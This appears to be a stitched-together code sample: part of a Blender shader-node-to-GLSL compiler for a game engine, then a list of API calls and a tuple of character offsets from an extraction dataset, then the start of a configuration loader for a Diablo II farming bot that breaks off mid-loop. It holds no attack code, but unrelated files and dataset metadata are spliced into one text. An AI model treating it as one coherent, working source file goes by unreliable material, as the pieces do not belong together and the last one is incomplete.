elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
def write_bump(node, res, scl=0.001):
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
# Testing.. get function parts..
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
##
def make_texture(image_node, tex_name, matname=None):
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
| [
"arm.material.mat_state.bind_textures.append",
"os.path.exists",
"os.path.getsize",
"os.makedirs",
"os.path.join",
"os.path.isfile",
"math.cos",
"shutil.copy",
"math.sin"
]
| [((68911, 68946), 'arm.material.mat_state.bind_textures.append', 'mat_state.bind_textures.append', (['tex'], {}), '(tex)\n', (68941, 68946), True, 'import arm.material.mat_state as mat_state\n'), ((64744, 64782), 'os.path.join', 'os.path.join', (['unpack_path', "tex['file']"], {}), "(unpack_path, tex['file'])\n", (64756, 64782), False, 'import os\n'), ((64652, 64679), 'os.path.exists', 'os.path.exists', (['unpack_path'], {}), '(unpack_path)\n', (64666, 64679), False, 'import os\n'), ((64693, 64717), 'os.makedirs', 'os.makedirs', (['unpack_path'], {}), '(unpack_path)\n', (64704, 64717), False, 'import os\n'), ((66088, 66126), 'os.path.join', 'os.path.join', (['unpack_path', "tex['file']"], {}), "(unpack_path, tex['file'])\n", (66100, 66126), False, 'import os\n'), ((63612, 63658), 'os.path.join', 'os.path.join', (['unpack_path', "(image.name + '.jpg')"], {}), "(unpack_path, image.name + '.jpg')\n", (63624, 63658), False, 'import os\n'), ((64826, 64857), 'os.path.isfile', 'os.path.isfile', (['unpack_filepath'], {}), '(unpack_filepath)\n', (64840, 64857), False, 'import os\n'), ((65989, 66016), 'os.path.exists', 'os.path.exists', (['unpack_path'], {}), '(unpack_path)\n', (66003, 66016), False, 'import os\n'), ((66034, 66058), 'os.makedirs', 'os.makedirs', (['unpack_path'], {}), '(unpack_path)\n', (66045, 66058), False, 'import os\n'), ((66197, 66227), 'os.path.isfile', 'os.path.isfile', (['converted_path'], {}), '(converted_path)\n', (66211, 66227), False, 'import os\n'), ((63518, 63545), 'os.path.exists', 'os.path.exists', (['unpack_path'], {}), '(unpack_path)\n', (63532, 63545), False, 'import os\n'), ((63563, 63587), 'os.makedirs', 'os.makedirs', (['unpack_path'], {}), '(unpack_path)\n', (63574, 63587), False, 'import os\n'), ((65563, 65600), 'shutil.copy', 'shutil.copy', (['texpath', 'unpack_filepath'], {}), '(texpath, unpack_filepath)\n', (65574, 65600), False, 'import shutil\n'), ((65158, 65189), 'os.path.isfile', 'os.path.isfile', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65172, 65189), False, 'import os\n'), ((65193, 65225), 'os.path.getsize', 'os.path.getsize', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65208, 65225), False, 'import os\n'), ((65446, 65477), 'os.path.isfile', 'os.path.isfile', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65460, 65477), False, 'import os\n'), ((65481, 65513), 'os.path.getsize', 'os.path.getsize', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65496, 65513), False, 'import os\n'), ((65517, 65541), 'os.path.getsize', 'os.path.getsize', (['texpath'], {}), '(texpath)\n', (65532, 65541), False, 'import os\n'), ((37395, 37406), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (37403, 37406), False, 'import math\n'), ((37408, 37419), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (37416, 37419), False, 'import math\n')] |
import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
def __init__(self, print_warnings: bool = False):
# print_warnings, what a hack... here it is, not making the effort
# passing a single config instance through bites me in the ass
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
